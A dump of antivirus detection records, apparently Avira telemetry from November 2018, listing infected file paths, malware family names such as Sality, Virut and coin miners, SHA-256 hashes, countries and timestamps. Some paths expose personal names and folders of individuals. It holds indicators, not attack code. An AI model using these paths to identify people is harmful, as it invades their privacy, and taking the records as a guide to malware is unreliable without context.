  Row(detection=Row(filename='addetto ai servizi di controllo (ex buttafuori).exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SERVIZI\\ADDETTO AI SERVIZI DI CONTROLLO (ex buttafuori).exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:12:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172043-c2687a2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-171731-A569503C\\AVSCAN-20181101-172043-C2687A2C', filesize=64000, name='W97M/Agent.2975818.#M1.#R1'), hash='87fb85fb2421077d090f6fc9944070bc3b9c60eb5249cff09fd7e6ce8be4fa17', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:20:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='oss 2018.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\OSS NUOVO SGB\\OSS 2018.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:32:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150044-9d23a0df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36c54126\\AVSCAN-20181101-145905-8A15D273\\AVSCAN-20181101-150044-9D23A0DF', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:00:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152957-e4d8b788', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152957-E4D8B788', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:30:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fomer', filepath='C:\\WINDOWS\\SYSTEM32\\TASKS\\Yahoo! Powered fomer', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='9181846258d386386a8495c47d25fa0d650b9c3d89a88aefa19fed328dee4dbe', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:03:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='normativa fer.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI NUOVI DEFINIITIVI\\schede presentazione corsi\\schede ultime APRILE 2016\\termoidraulici ed elettrici\\Normativa FER.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:15:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vanotti moira.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 573160\\VANOTTI MOIRA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:27:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tesi finita.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\TESI FINITA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:08:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123930-26208c62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bb80a544\\AVSCAN-20181101-123845-1E4AD714\\AVSCAN-20181101-123930-26208C62', filesize=56000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='ba3ec70aa46b32062de3c8ca0c4e23df68829c095a3a07f42f6eeec5868437c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:39:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kms10.exe', filepath='c:\\windows\\kms10\\kms10.exe', filesize=2176000, name='SPR/HackKMS.d5c565.#M1.#R1'), hash='d5c56597bf7381a46cd51bc26ff6a004945bc08a2760197ae45b98d904d14268', metadata=Row(cmdline='auto', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-01T02:53:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152345-49efeecb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152345-49EFEECB', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:23:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\lgE48D2.tmp\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:09:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\2sqdxocy52f\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:59:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eicfg_remover.exe', filepath='D:\\برامج\\WinSetupFromUSB-1-4\\files\\tools\\winisoutils\\eicfg_remover.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='9cba6504cd86e5e82780453c49cf9ceebd97f138ab5c45db00b05dd08a80ef74', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T11:03:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T11:05:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-094846-899093a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e94398e3\\AVSCAN-20181104-094646-7AE93737\\AVSCAN-20181104-094846-899093A5', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:48:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7842601\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/ads:1 \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Baixaki_Virtual DJ_3258377755.exe', parentsize=2299080, timestamp='2018-11-04T00:35:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/LOGFILE=\\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Avira\\\\\\\\Antivirus\\\\\\\\LOGFILES\\\\\\\\AviraSecurityCenterAgent-2018-11-04-10-30-56.log\\\\\\" \\\\\\/LOGLEVEL=\\\\\\"STANDARD\\\\\\" \\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-31T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpschd.dll Cyclic Check\\\\\\"', country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', parentsize=840000, timestamp='2018-11-04T19:50:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='atiodcli.exe', filepath='d:\\برامج\\d\\d\\g\\a1\\b_72960\\atiodcli.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='0ce3bee1557e95c4509ed16de53b917719c7daa26f1af631b38436037faa3e80', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:46:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='6d72a116be57c06d272d643fa65661a8173d7c515d29436351b7a9b331c722ed', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:M2lv44Lh9kuhRVWb.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T19:39:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:45:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-210634-9a5ceec8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0678b562\\AVSCAN-20181103-203524-E56FFA60\\AVSCAN-20181103-210634-9A5CEEC8', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:06:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0348985.exe', filepath='\\\\?\\J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP439\\A0348985.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:51:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-222209-71c0842d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6931b99d\\AVSCAN-20181104-221652-2BB38B21\\AVSCAN-20181104-222209-71C0842D', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:22:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='587f4e55aec9cf18ea5fcd7bf8dd2d74f326ba3a', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\587f4e55aec9cf18ea5fcd7bf8dd2d74f326ba3a', filesize=2240000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='2d57c338b6c749ba450b7d5a08cfbd0681d2cba88aa024a70da2b5529d7182e2', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:09:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-155552-8052100f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77a591b5\\AVSCAN-20181104-155357-6E504C8E\\AVSCAN-20181104-155552-8052100F', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:55:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-145554-64edcc0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_21532a04\\AVSCAN-20181104-145408-561A4DF8\\AVSCAN-20181104-145554-64EDCC0F', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:55:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='videoconvert-ttab02-a74bec0684c08ff3beb5e8ebd351d67c.exe', filepath='C:\\Users\\X\\Desktop\\source\\MS\\InProd20181102-Tooltab\\VideoConvert-TTAB02-A74BEC0684C08FF3BEB5E8EBD351D67C.exe', filesize=380000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='2ef9d244711647f816f2f0600bfeb1247fad7214ccc12e1851e40d42e7d3b3b0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T04:37:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0182556.exe', filepath='d:\\system volume information\\_restore{a0838581-84a6-4d91-8040-c33e0d667479}\\rp102\\A0182556.exe', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='98ac709299f725a47b3ddd1f535af413d6a4a6b704c38170c25193d7ecab84f3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T04:14:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132048-42904cb8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132048-42904CB8', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:20:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130741-071c169a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130741-071C169A', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:07:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='idlemonitor.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{AGG3M-BF0CW-G8RJ8-FB7P3-6ACHK-A6A7Q}\\idlemonitor.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Packages\\SandboxieRpcSc.exe', parentsize=260608, timestamp='2018-11-04T18:55:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T14:29:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151238-6e1723c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-151157-699E1055\\AVSCAN-20181104-151238-6E1723C5', filesize=512000, name='Adware/SpeedBit.ngud.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T08:12:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:15:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202516-17fd568d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ab1a527\\AVSCAN-20181104-202508-1673569C\\AVSCAN-20181104-202516-17FD568D', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:25:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered notel', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered notel', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='66bf5e284a4da1edd06c0642be2278a0cafe63675b99bd29a587703cb431e6d7', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:29:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T07:31:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:47:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214234-2375a89e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-214234-2375A89E', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:42:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yamgeneric001.exe', filepath='\\\\?\\C:\\Windows\\yamgeneric001.exe', filesize=3840000, name='SPR/BitCoin.R.17.#M1.#R1'), hash='123ddc718d5557233de61371644f83948c59c12e897ff58dec883c64e22aaf3b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:21:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-115708-087577b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_949c51c9\\AVSCAN-20181104-114243-D1379150\\AVSCAN-20181104-115708-087577B5', filesize=1336000, name='PUA/InstallCore.#M1.#R1'), hash='4ba0876fef0855708223e1ccd6ba78e35e0cb264716caf88703ab50aec1935bb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:57:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='.trashes.exe', filepath='D:\\.Trashes.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:16:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0003412.exe', filepath='f:\\system volume information\\_restore{c479216e-5d38-4428-b4db-e28930c85d49}\\rp8\\A0003412.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='5bfea8426f1417a143c363847a360a7a013be23c4aaa1c9474e08b3af11d35bd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:29:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xerces-c_2_6.dll', filepath='C:\\AMD\\Win7-32Bit-Radeon-Software-Adrenalin-Edition-17.12.1-Dec11\\Bin\\xerces-c_2_6.dll', filesize=2864000, name='W32/Ramnit.C.#M1.#R1'), hash='b2baa527e6eca6d855ed2201dfbf65a04a887dd3273fb945b339666e6e5cba06', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\UCBrowser\\Application\\UCBrowser.exe', parentsize=1225616, timestamp='2018-11-04T08:07:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='511e5e2a1f74aabb0d784f79be400b829407820b', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\511e5e2a1f74aabb0d784f79be400b829407820b', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='19fed12057a16bbbb69cb89bbf876c9756bb53b6765c41c9d44d4084d5840a56', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:00:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-100042-bab99c12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0eb24273\\AVSCAN-20181104-100012-B6CAA2DB\\AVSCAN-20181104-100042-BAB99C12', filesize=1944000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bb7831568f5af656b79b5de8de61be16e91553643b1be222ca5f70940bf3a94c', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:00:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T02:33:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-113707-2e17e7cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0255a3\\AVSCAN-20181104-112225-BD1A616D\\AVSCAN-20181104-113707-2E17E7CB', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:37:07Z'), dt=datetime.date(2018, 11, 4)),
